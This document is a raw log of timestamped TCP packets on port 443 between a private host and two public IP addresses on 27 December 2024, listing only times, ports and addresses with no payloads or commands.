Dec 27, 2024 07:10:46.807910919 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.808310032 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.808767080 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.848397017 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:46.848520994 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:46.953434944 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.126672029 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.128886938 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.129070044 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.129651070 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.131501913 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.137487888 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.137706041 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.137862921 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.137914896 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138011932 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138108015 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138124943 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138227940 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138243914 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138258934 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138274908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138446093 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138462067 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138475895 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138509035 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138521910 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138533115 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138545036 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.138972998 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.152762890 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.152904987 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.152946949 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.152961016 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.152975082 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.153043985 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.159626007 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.159677982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.159826040 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.159841061 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.159852028 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.159854889 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.164721966 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.167010069 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.167275906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.167339087 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.167362928 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.167439938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.167454958 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.167531013 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.167547941 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.167558908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.181545973 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.182560921 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.183947086 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.184098959 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.188941956 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.204648018 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.370079041 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.370189905 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.436850071 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.439625978 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.477257967 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.488012075 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.502857924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.503582954 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.503865004 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504051924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504200935 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504225969 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504241943 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504304886 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504662991 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504755974 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504770041 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.504785061 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.505311966 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.511730909 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.517180920 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.548764944 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.549074888 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.555001974 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.555032015 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.555046082 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.555062056 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.555075884 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.555320978 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.555438995 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.555517912 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:47.704329967 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.704685926 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.705718040 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.706090927 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.769902945 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.770634890 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.772156954 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.773150921 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:47.773426056 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.831403971 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.831512928 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:47.857821941 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:47.901601076 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:48.179416895 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.180042028 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.180814028 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.181169987 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.283977032 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.285862923 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.287230015 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.287611008 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.301489115 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:48.635607958 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:48.644191980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:48.644284010 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:48.644298077 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:48.644309998 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:48.644562960 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:48.645895004 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.647274971 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:48.648031950 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.648097992 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.648111105 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.648345947 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.650796890 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.650866032 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.651092052 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.673599958 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:48.677018881 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.973288059 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:48.984127045 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.985234022 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.985732079 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:48.986144066 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:48.991976976 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.001730919 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.052875042 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.052922010 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.052990913 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.053000927 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.053253889 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.053338051 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.081307888 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.171341896 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.400139093 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.501470089 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512007952 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512489080 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512533903 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512546062 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512635946 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512650013 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512765884 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512778044 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512789965 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512927055 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512938976 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.512948990 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:49.513458014 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.513645887 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.546297073 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.553607941 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.562113047 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.562210083 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.562277079 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.562349081 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.562407017 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:49.562474966 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.097882986 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.097894907 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.097908974 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.097969055 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.097981930 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.097991943 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098005056 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098016977 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098027945 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098038912 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098424911 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098436117 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098442078 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098469019 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098479033 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098488092 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098503113 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.098995924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099005938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099015951 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099026918 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099050999 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099061012 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099069118 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099121094 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099133015 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099143028 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099153042 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099164009 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099169970 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.099638939 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.099807978 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.099992037 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100003958 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100014925 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100025892 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100037098 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100047112 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100056887 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100068092 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100078106 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100089073 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100132942 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100161076 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.100296974 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.100961924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100975990 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100986004 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.100997925 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101007938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101018906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101032019 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101042986 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101056099 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101067066 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101078987 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101090908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101102114 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101407051 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.101903915 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101916075 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.101916075 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101927042 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101946115 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101952076 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101958036 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101964951 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101969957 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101975918 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.101982117 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102350950 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.102679014 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102848053 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102859020 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102869034 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102880955 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102891922 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102904081 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102915049 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102926970 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102938890 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.102974892 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103636026 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103796959 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103807926 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103818893 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103830099 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103842020 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103854895 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103866100 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103878021 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103888988 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103900909 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103913069 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.103924990 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104422092 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.104567051 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104581118 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104693890 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104705095 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104715109 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104726076 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104753971 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104764938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104775906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104785919 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.104995012 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.105217934 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.105321884 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105334044 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105345011 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105401039 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.105437994 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105449915 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105458975 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105485916 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105499029 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105506897 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105513096 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105524063 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105535030 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.105545998 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106389999 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106403112 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106414080 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106434107 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106446028 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106456995 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106467962 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106478930 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106492043 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106503963 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106514931 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106528044 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.106538057 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107347965 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107359886 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107369900 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107381105 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107393026 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107409000 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107419968 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107431889 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107443094 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107454062 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107479095 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107491016 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107501984 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107512951 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107522964 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.107892036 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.108212948 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.108226061 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108237982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108247995 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108258009 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108269930 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108280897 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108292103 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108304024 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108316898 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108591080 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.108831882 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108844042 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108880043 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108896971 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108906984 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:50.108995914 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.110050917 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.110466957 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.110800982 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.111059904 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:50.139677048 CET	58828	443	192.168.2.5	23.209.72.7
